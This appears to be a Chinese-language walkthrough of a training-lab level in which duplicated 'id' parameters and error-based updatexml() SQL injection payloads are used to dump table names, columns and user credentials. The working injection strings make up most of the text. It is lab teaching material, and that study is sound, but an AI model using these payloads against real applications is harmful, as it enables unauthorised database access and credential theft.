欢迎界面和上一关差不多 所以我们还是使用双参数注入
首先判断第二个参数是否为数字型
输入如下
id=1'&&id=1 and 1=2
回显如下 所以属于字符型
![](https://img-blog.csdnimg.cn/52574297fd174faab603081ca73a9667.png)
然后判断是单引还是双引 输入如下
id=1'&&id=1'
回显如下 正确回显了 所以不属于单引号注入
![](https://img-blog.csdnimg.cn/243ea3c5feb14420be877908f6b0c1cb.png)
然后输入双引号 输入如下
id=1'&&id=1"
回显如下 并且出现了报错信息 提示我们
注入点属于双引号注入并且带有一个括号
![](https://img-blog.csdnimg.cn/af91a9c5976743eb80571583f007d429.png)
佐证一下 输入如下
id=1'&&id=1")--+
回显如下 我们的判断是正确的
![](https://img-blog.csdnimg.cn/9f1f39e88a814434833310a3e9f33753.png)
然后这道题即对正确有页面上的反应 有对错误有页面上的反应 所以我们既可以使用联合注入 又可以使用报错注入 这道题我们使用报错注入吧
首先爆库 输入如下
id=1'&&id=1") and updatexml(1,concat(0x7e,database(),0x7e),1)--+
回显如下
![](https://img-blog.csdnimg.cn/5359ab53b5e9435ea1d715171ae0efff.png)
接着进行报表操作 输入如下
id=1'&&id=1") and updatexml(1,concat(0x7e,(select group_concat(table_name) from information_schema.tables where table_schema=database()),0x7e),1)--+
回显如下
![](https://img-blog.csdnimg.cn/0e0f2e25d07148f7b0d6fa841770616f.png)
接着进行爆字段的操作 输入如下
id=1'&&id=1") and updatexml(1,concat(0x7e,(select group_concat(column_name) from information_schema.columns where table_schema=database() and table_name='users'),0x7e),1)--+
回显如下
![](https://img-blog.csdnimg.cn/ca4b1efa44d442f695377f6902fb6458.png)
最后进行爆用户名和密码的操作 输入如下
id=1'&&id=1") and updatexml(1,concat(0x7e,(select group_concat(username,password) from users),0x7e),1)--+
回显如下
![](https://img-blog.csdnimg.cn/2110f0776d194613859ac06bb8a7dae6.png)
这一关也顺利通关了 嗨嗨!!